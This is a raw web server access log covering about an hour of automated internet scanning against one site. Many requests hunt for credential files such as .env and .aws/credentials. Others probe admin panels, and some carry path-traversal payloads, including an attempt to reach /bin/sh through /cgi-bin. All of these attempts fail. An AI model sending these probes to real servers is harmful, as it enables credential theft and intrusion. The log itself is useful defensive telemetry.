94.156.68.104 - - [01/Sep/2024:04:56:05 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; U; Linux i686; pt-PT; rv:1.9.2.3) Gecko/20100402 Iceweasel/3.6.3 (like Firefox/3.6.3) GTB7.0"
94.156.68.104 - - [01/Sep/2024:04:56:29 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 12_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148 Safari/605.1.15 Version/12.2.1.0.4"
94.156.68.104 - - [01/Sep/2024:04:56:35 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Linux; Android 8.0.0; HTC U Ultra) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.89 Mobile Safari/537.36"
94.156.68.104 - - [01/Sep/2024:04:56:40 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1061.1 Safari/536.3"
94.156.68.104 - - [01/Sep/2024:04:56:42 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Linux; Android 9; moto x4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Mobile Safari/537.36"
94.156.68.104 - - [01/Sep/2024:04:56:47 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3887.0 Safari/537.36"
185.224.128.84 - - [01/Sep/2024:04:57:10 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
52.76.71.100 - - [01/Sep/2024:04:57:28 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Go-http-client/1.1"
154.216.17.140 - - [01/Sep/2024:04:58:56 +0200] "GET /?phpinfo=1 HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
45.156.129.120 - - [01/Sep/2024:05:00:41 +0200] "GET /api/session/properties HTTP/1.1" 404 327 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
45.156.129.120 - - [01/Sep/2024:05:00:47 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
45.156.129.120 - - [01/Sep/2024:05:00:55 +0200] "GET /webfig/ HTTP/1.1" 404 312 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
45.156.129.120 - - [01/Sep/2024:05:01:13 +0200] "GET /console HTTP/1.1" 404 312 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
45.156.129.120 - - [01/Sep/2024:05:01:30 +0200] "GET /solr/ HTTP/1.1" 404 310 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
45.156.129.120 - - [01/Sep/2024:05:01:46 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
45.156.129.120 - - [01/Sep/2024:05:01:46 +0200] "GET /Telerik.Web.UI.WebResource.axd?type=rau HTTP/1.1" 404 335 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
45.156.129.120 - - [01/Sep/2024:05:02:00 +0200] "GET /js/NewWindow_2_all.js HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
45.156.129.120 - - [01/Sep/2024:05:02:01 +0200] "GET /identity HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
167.94.138.33 - - [01/Sep/2024:05:02:11 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
45.156.129.120 - - [01/Sep/2024:05:02:14 +0200] "GET /sitecore/shell/sitecore.version.xml HTTP/1.1" 404 340 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
167.94.138.33 - - [01/Sep/2024:05:02:16 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.138.33 - - [01/Sep/2024:05:02:16 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.138.33 - - [01/Sep/2024:05:02:17 +0200] "PRI * HTTP/2.0" 400 329 "-" "-"
45.156.129.120 - - [01/Sep/2024:05:02:27 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
45.156.129.120 - - [01/Sep/2024:05:02:27 +0200] "GET /static/historypage.js HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
154.216.17.140 - - [01/Sep/2024:05:02:37 +0200] "GET /phpinfo.php HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
45.156.129.120 - - [01/Sep/2024:05:02:43 +0200] "GET /cf_scripts/scripts/ajax/ckeditor/ckeditor.js HTTP/1.1" 404 349 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
45.156.129.120 - - [01/Sep/2024:05:02:43 +0200] "GET /favicon-32x32.png HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
45.156.129.120 - - [01/Sep/2024:05:02:43 +0200] "GET /cgi-bin/authLogin.cgi HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
45.156.129.120 - - [01/Sep/2024:05:02:56 +0200] "GET /aspera/faspex/ HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
45.156.129.120 - - [01/Sep/2024:05:02:56 +0200] "GET /sugar_version.json HTTP/1.1" 404 323 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
45.156.129.120 - - [01/Sep/2024:05:03:09 +0200] "GET /admin/ HTTP/1.1" 404 311 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
45.156.129.120 - - [01/Sep/2024:05:03:10 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
45.156.129.120 - - [01/Sep/2024:05:03:10 +0200] "GET /index.jsp HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
45.156.129.120 - - [01/Sep/2024:05:03:25 +0200] "GET /zabbix/favicon.ico HTTP/1.1" 404 323 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
45.156.129.120 - - [01/Sep/2024:05:03:39 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
45.156.129.120 - - [01/Sep/2024:05:03:55 +0200] "GET /WebInterface/ HTTP/1.1" 404 318 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
45.156.129.120 - - [01/Sep/2024:05:04:11 +0200] "HEAD /icons/sphere1.png HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
45.156.129.120 - - [01/Sep/2024:05:04:11 +0200] "HEAD /icons/.%%32%65/.%%32%65/apache2/icons/non-existant-image.png HTTP/1.1" 400 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
45.156.129.120 - - [01/Sep/2024:05:04:11 +0200] "HEAD /icons/.%%32%65/.%%32%65/apache2/icons/sphere1.png HTTP/1.1" 400 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
45.156.129.120 - - [01/Sep/2024:05:04:11 +0200] "HEAD /icons/.%2e/%2e%2e/apache2/icons/sphere1.png HTTP/1.1" 400 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
45.156.129.120 - - [01/Sep/2024:05:04:12 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36"
45.156.129.120 - - [01/Sep/2024:05:04:12 +0200] "GET /showLogin.cc HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
45.156.129.120 - - [01/Sep/2024:05:04:26 +0200] "GET /ext-js/app/common/zld_product_spec.js HTTP/1.1" 404 342 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
149.50.103.48 - - [01/Sep/2024:05:05:04 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
95.214.52.167 - - [01/Sep/2024:05:05:21 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
185.170.144.3 - - [01/Sep/2024:05:07:27 +0200] "\x03" 501 316 "-" "-"
142.93.197.121 - - [01/Sep/2024:05:07:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; bingbot/2.0 http://www.bing.com/bingbot.htm)"
205.210.31.99 - - [01/Sep/2024:05:07:51 +0200] "\x16\x03\x01" 501 318 "-" "-"
205.210.31.99 - - [01/Sep/2024:05:07:51 +0200] "\x16\x03\x01" 501 318 "-" "-"
185.170.144.3 - - [01/Sep/2024:05:08:54 +0200] "\x03" 501 316 "-" "-"
185.170.144.3 - - [01/Sep/2024:05:08:57 +0200] "\x03" 501 316 "-" "-"
185.170.144.3 - - [01/Sep/2024:05:09:03 +0200] "\x03" 501 316 "-" "-"
185.170.144.3 - - [01/Sep/2024:05:09:04 +0200] "\x03" 501 316 "-" "-"
185.170.144.3 - - [01/Sep/2024:05:09:07 +0200] "\x03" 501 316 "-" "-"
185.170.144.3 - - [01/Sep/2024:05:09:11 +0200] "\x03" 501 316 "-" "-"
185.170.144.3 - - [01/Sep/2024:05:09:12 +0200] "\x03" 501 316 "-" "-"
185.170.144.3 - - [01/Sep/2024:05:09:24 +0200] "\x03" 501 316 "-" "-"
185.170.144.3 - - [01/Sep/2024:05:09:30 +0200] "\x03" 501 316 "-" "-"
45.177.246.233 - - [01/Sep/2024:05:09:46 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
89.190.156.137 - - [01/Sep/2024:05:12:37 +0200] "GET / HTTP/1.0" 200 1229 "-" "ivre-masscan/1.3 https://github.com/robertdavidgraham/"
45.156.130.6 - - [01/Sep/2024:05:15:41 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
45.156.129.57 - - [01/Sep/2024:05:17:11 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
89.190.156.137 - - [01/Sep/2024:05:17:26 +0200] "GET / HTTP/1.0" 200 1229 "-" "ivre-masscan/1.3 https://github.com/robertdavidgraham/"
149.50.103.48 - - [01/Sep/2024:05:18:03 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
89.190.156.137 - - [01/Sep/2024:05:19:54 +0200] "GET / HTTP/1.0" 200 1229 "-" "ivre-masscan/1.3 https://github.com/robertdavidgraham/"
205.210.31.106 - - [01/Sep/2024:05:24:02 +0200] "GET / HTTP/1.0" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
149.50.103.48 - - [01/Sep/2024:05:24:45 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
198.235.24.76 - - [01/Sep/2024:05:27:31 +0200] "GET / HTTP/1.0" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
89.190.156.137 - - [01/Sep/2024:05:31:15 +0200] "GET / HTTP/1.0" 200 1229 "-" "ivre-masscan/1.3 https://github.com/robertdavidgraham/"
149.50.103.48 - - [01/Sep/2024:05:35:13 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
179.43.133.242 - - [01/Sep/2024:05:37:06 +0200] "GET /linusadmin-phpinfo.php HTTP/1.1" 404 327 "-" "Go-http-client/1.1"
179.43.133.242 - - [01/Sep/2024:05:37:06 +0200] "GET /info.php HTTP/1.1" 404 313 "-" "Go-http-client/1.1"
179.43.133.242 - - [01/Sep/2024:05:37:06 +0200] "GET /phpinfo.php HTTP/1.1" 404 316 "-" "Go-http-client/1.1"
179.43.133.242 - - [01/Sep/2024:05:37:06 +0200] "GET /phpinfo HTTP/1.1" 404 312 "-" "Go-http-client/1.1"
179.43.133.242 - - [01/Sep/2024:05:37:07 +0200] "GET /infos.php HTTP/1.1" 404 314 "-" "Go-http-client/1.1"
179.43.133.242 - - [01/Sep/2024:05:37:07 +0200] "GET /_profiler/phpinfo HTTP/1.1" 404 322 "-" "Go-http-client/1.1"
179.43.133.242 - - [01/Sep/2024:05:37:07 +0200] "GET /local-phpinfo.php HTTP/1.1" 404 322 "-" "Go-http-client/1.1"
179.43.133.242 - - [01/Sep/2024:05:37:07 +0200] "GET /info HTTP/1.1" 404 309 "-" "Go-http-client/1.1"
179.43.133.242 - - [01/Sep/2024:05:37:07 +0200] "GET /sendgrid.env HTTP/1.1" 404 317 "-" "Go-http-client/1.1"
179.43.133.242 - - [01/Sep/2024:05:37:07 +0200] "GET /.env_example HTTP/1.1" 404 317 "-" "Go-http-client/1.1"
179.43.133.242 - - [01/Sep/2024:05:37:07 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Go-http-client/1.1"
179.43.133.242 - - [01/Sep/2024:05:37:07 +0200] "GET /core/.env HTTP/1.1" 404 314 "-" "Go-http-client/1.1"
179.43.133.242 - - [01/Sep/2024:05:37:07 +0200] "GET /app/.env HTTP/1.1" 404 313 "-" "Go-http-client/1.1"
179.43.133.242 - - [01/Sep/2024:05:37:07 +0200] "GET /laravel/.env HTTP/1.1" 404 317 "-" "Go-http-client/1.1"
179.43.133.242 - - [01/Sep/2024:05:37:07 +0200] "GET /.aws/credentials HTTP/1.1" 404 321 "-" "Go-http-client/1.1"
179.43.133.242 - - [01/Sep/2024:05:37:07 +0200] "GET /web/.env HTTP/1.1" 404 313 "-" "Go-http-client/1.1"
179.43.133.242 - - [01/Sep/2024:05:37:07 +0200] "GET /crm/.env HTTP/1.1" 404 313 "-" "Go-http-client/1.1"
179.43.133.242 - - [01/Sep/2024:05:37:07 +0200] "GET /backend/.env HTTP/1.1" 404 317 "-" "Go-http-client/1.1"
179.43.133.242 - - [01/Sep/2024:05:37:08 +0200] "GET /local/.env HTTP/1.1" 404 315 "-" "Go-http-client/1.1"
179.43.133.242 - - [01/Sep/2024:05:37:09 +0200] "GET /api/.env HTTP/1.1" 404 313 "-" "Go-http-client/1.1"
179.43.133.242 - - [01/Sep/2024:05:37:09 +0200] "GET /admin/.env HTTP/1.1" 404 315 "-" "Go-http-client/1.1"
179.43.133.242 - - [01/Sep/2024:05:37:10 +0200] "GET /application/.env HTTP/1.1" 404 321 "-" "Go-http-client/1.1"
93.174.93.12 - - [01/Sep/2024:05:40:48 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (iPad; CPU OS 12_3_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148;WeRead/4.1.3 (iPad; iOS 12.3.1; Scale/2.00)"
93.174.93.12 - - [01/Sep/2024:05:40:58 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (iPad; CPU OS 12_3_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148;WeRead/4.1.3 (iPad; iOS 12.3.1; Scale/2.00)"
8.209.243.192 - - [01/Sep/2024:05:41:04 +0200] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 400 333 "-" "Custom-AsyncHttpClient"
95.214.55.138 - - [01/Sep/2024:05:41:16 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
93.174.93.12 - - [01/Sep/2024:05:42:30 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (iPad; CPU OS 12_3_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148;WeRead/4.1.3 (iPad; iOS 12.3.1; Scale/2.00)"
205.210.31.184 - - [01/Sep/2024:05:43:22 +0200] "GET / HTTP/1.0" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
89.190.156.137 - - [01/Sep/2024:05:43:25 +0200] "GET / HTTP/1.0" 200 1229 "-" "ivre-masscan/1.3 https://github.com/robertdavidgraham/"
95.214.55.138 - - [01/Sep/2024:05:43:37 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
185.224.128.84 - - [01/Sep/2024:05:44:00 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
45.156.128.47 - - [01/Sep/2024:05:44:29 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
170.106.84.136 - - [01/Sep/2024:05:44:58 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
149.50.103.48 - - [01/Sep/2024:05:45:37 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
95.214.55.138 - - [01/Sep/2024:05:46:12 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
89.190.156.137 - - [01/Sep/2024:05:46:16 +0200] "GET / HTTP/1.0" 200 1229 "-" "ivre-masscan/1.3 https://github.com/robertdavidgraham/"
149.50.103.48 - - [01/Sep/2024:05:46:30 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
95.214.55.138 - - [01/Sep/2024:05:47:32 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
179.43.133.242 - - [01/Sep/2024:05:47:33 +0200] "GET /linusadmin-phpinfo.php HTTP/1.1" 404 327 "-" "Go-http-client/1.1"
179.43.133.242 - - [01/Sep/2024:05:47:33 +0200] "GET /info.php HTTP/1.1" 404 313 "-" "Go-http-client/1.1"
179.43.133.242 - - [01/Sep/2024:05:47:33 +0200] "GET /phpinfo.php HTTP/1.1" 404 316 "-" "Go-http-client/1.1"
179.43.133.242 - - [01/Sep/2024:05:47:33 +0200] "GET /phpinfo HTTP/1.1" 404 312 "-" "Go-http-client/1.1"
179.43.133.242 - - [01/Sep/2024:05:47:33 +0200] "GET /infos.php HTTP/1.1" 404 314 "-" "Go-http-client/1.1"
179.43.133.242 - - [01/Sep/2024:05:47:33 +0200] "GET /_profiler/phpinfo HTTP/1.1" 404 322 "-" "Go-http-client/1.1"
179.43.133.242 - - [01/Sep/2024:05:47:33 +0200] "GET /local-phpinfo.php HTTP/1.1" 404 322 "-" "Go-http-client/1.1"
179.43.133.242 - - [01/Sep/2024:05:47:33 +0200] "GET /info HTTP/1.1" 404 309 "-" "Go-http-client/1.1"
179.43.133.242 - - [01/Sep/2024:05:47:33 +0200] "GET /sendgrid.env HTTP/1.1" 404 317 "-" "Go-http-client/1.1"
179.43.133.242 - - [01/Sep/2024:05:47:33 +0200] "GET /.env_example HTTP/1.1" 404 317 "-" "Go-http-client/1.1"
179.43.133.242 - - [01/Sep/2024:05:47:33 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Go-http-client/1.1"
179.43.133.242 - - [01/Sep/2024:05:47:33 +0200] "GET /core/.env HTTP/1.1" 404 314 "-" "Go-http-client/1.1"
179.43.133.242 - - [01/Sep/2024:05:47:33 +0200] "GET /app/.env HTTP/1.1" 404 313 "-" "Go-http-client/1.1"
179.43.133.242 - - [01/Sep/2024:05:47:33 +0200] "GET /laravel/.env HTTP/1.1" 404 317 "-" "Go-http-client/1.1"
179.43.133.242 - - [01/Sep/2024:05:47:34 +0200] "GET /.aws/credentials HTTP/1.1" 404 321 "-" "Go-http-client/1.1"
179.43.133.242 - - [01/Sep/2024:05:47:34 +0200] "GET /web/.env HTTP/1.1" 404 313 "-" "Go-http-client/1.1"
179.43.133.242 - - [01/Sep/2024:05:47:34 +0200] "GET /crm/.env HTTP/1.1" 404 313 "-" "Go-http-client/1.1"
179.43.133.242 - - [01/Sep/2024:05:47:34 +0200] "GET /backend/.env HTTP/1.1" 404 317 "-" "Go-http-client/1.1"
179.43.133.242 - - [01/Sep/2024:05:47:35 +0200] "GET /local/.env HTTP/1.1" 404 315 "-" "Go-http-client/1.1"
179.43.133.242 - - [01/Sep/2024:05:47:35 +0200] "GET /api/.env HTTP/1.1" 404 313 "-" "Go-http-client/1.1"
179.43.133.242 - - [01/Sep/2024:05:47:36 +0200] "GET /admin/.env HTTP/1.1" 404 315 "-" "Go-http-client/1.1"
179.43.133.242 - - [01/Sep/2024:05:47:36 +0200] "GET /application/.env HTTP/1.1" 404 321 "-" "Go-http-client/1.1"
149.50.103.48 - - [01/Sep/2024:05:52:13 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
149.50.103.48 - - [01/Sep/2024:05:53:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
179.43.133.242 - - [01/Sep/2024:05:54:12 +0200] "GET /linusadmin-phpinfo.php HTTP/1.1" 404 327 "-" "Go-http-client/1.1"
179.43.133.242 - - [01/Sep/2024:05:54:12 +0200] "GET /info.php HTTP/1.1" 404 313 "-" "Go-http-client/1.1"
179.43.133.242 - - [01/Sep/2024:05:54:13 +0200] "GET /phpinfo.php HTTP/1.1" 404 316 "-" "Go-http-client/1.1"
179.43.133.242 - - [01/Sep/2024:05:54:13 +0200] "GET /phpinfo HTTP/1.1" 404 312 "-" "Go-http-client/1.1"
179.43.133.242 - - [01/Sep/2024:05:54:13 +0200] "GET /infos.php HTTP/1.1" 404 314 "-" "Go-http-client/1.1"
179.43.133.242 - - [01/Sep/2024:05:54:13 +0200] "GET /_profiler/phpinfo HTTP/1.1" 404 322 "-" "Go-http-client/1.1"
179.43.133.242 - - [01/Sep/2024:05:54:13 +0200] "GET /local-phpinfo.php HTTP/1.1" 404 322 "-" "Go-http-client/1.1"
179.43.133.242 - - [01/Sep/2024:05:54:13 +0200] "GET /info HTTP/1.1" 404 309 "-" "Go-http-client/1.1"
179.43.133.242 - - [01/Sep/2024:05:54:13 +0200] "GET /sendgrid.env HTTP/1.1" 404 317 "-" "Go-http-client/1.1"
179.43.133.242 - - [01/Sep/2024:05:54:13 +0200] "GET /.env_example HTTP/1.1" 404 317 "-" "Go-http-client/1.1"
179.43.133.242 - - [01/Sep/2024:05:54:13 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Go-http-client/1.1"
179.43.133.242 - - [01/Sep/2024:05:54:13 +0200] "GET /core/.env HTTP/1.1" 404 314 "-" "Go-http-client/1.1"
179.43.133.242 - - [01/Sep/2024:05:54:13 +0200] "GET /app/.env HTTP/1.1" 404 313 "-" "Go-http-client/1.1"
179.43.133.242 - - [01/Sep/2024:05:54:13 +0200] "GET /laravel/.env HTTP/1.1" 404 317 "-" "Go-http-client/1.1"
179.43.133.242 - - [01/Sep/2024:05:54:13 +0200] "GET /.aws/credentials HTTP/1.1" 404 321 "-" "Go-http-client/1.1"
179.43.133.242 - - [01/Sep/2024:05:54:13 +0200] "GET /web/.env HTTP/1.1" 404 313 "-" "Go-http-client/1.1"
179.43.133.242 - - [01/Sep/2024:05:54:13 +0200] "GET /crm/.env HTTP/1.1" 404 313 "-" "Go-http-client/1.1"
179.43.133.242 - - [01/Sep/2024:05:54:13 +0200] "GET /backend/.env HTTP/1.1" 404 317 "-" "Go-http-client/1.1"
179.43.133.242 - - [01/Sep/2024:05:54:13 +0200] "GET /local/.env HTTP/1.1" 404 315 "-" "Go-http-client/1.1"
179.43.133.242 - - [01/Sep/2024:05:54:14 +0200] "GET /api/.env HTTP/1.1" 404 313 "-" "Go-http-client/1.1"
179.43.133.242 - - [01/Sep/2024:05:54:14 +0200] "GET /admin/.env HTTP/1.1" 404 315 "-" "Go-http-client/1.1"
179.43.133.242 - - [01/Sep/2024:05:54:15 +0200] "GET /application/.env HTTP/1.1" 404 321 "-" "Go-http-client/1.1"
149.50.103.48 - - [01/Sep/2024:05:56:28 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
149.50.103.48 - - [01/Sep/2024:05:57:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
198.235.24.206 - - [01/Sep/2024:06:00:34 +0200] "\x16\x03\x01" 501 318 "-" "-"
198.235.24.206 - - [01/Sep/2024:06:00:34 +0200] "\x16\x03\x01" 501 318 "-" "-"
159.89.97.151 - - [01/Sep/2024:06:01:19 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
159.89.97.151 - - [01/Sep/2024:06:01:19 +0200] "GET /odinhttpcall1725162679 HTTP/1.1" 404 327 "-" "Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)"
159.89.97.151 - - [01/Sep/2024:06:01:19 +0200] "POST /sdk HTTP/1.1" 404 308 "-" "Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)"
159.89.97.151 - - [01/Sep/2024:06:01:19 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
159.89.97.151 - - [01/Sep/2024:06:01:19 +0200] "GET /HNAP1 HTTP/1.1" 404 310 "-" "Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)"
159.89.97.151 - - [01/Sep/2024:06:01:19 +0200] "GET /evox/about HTTP/1.1" 404 315 "-" "Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)"
159.89.97.151 - - [01/Sep/2024:06:01:19 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
159.89.97.151 - - [01/Sep/2024:06:01:19 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
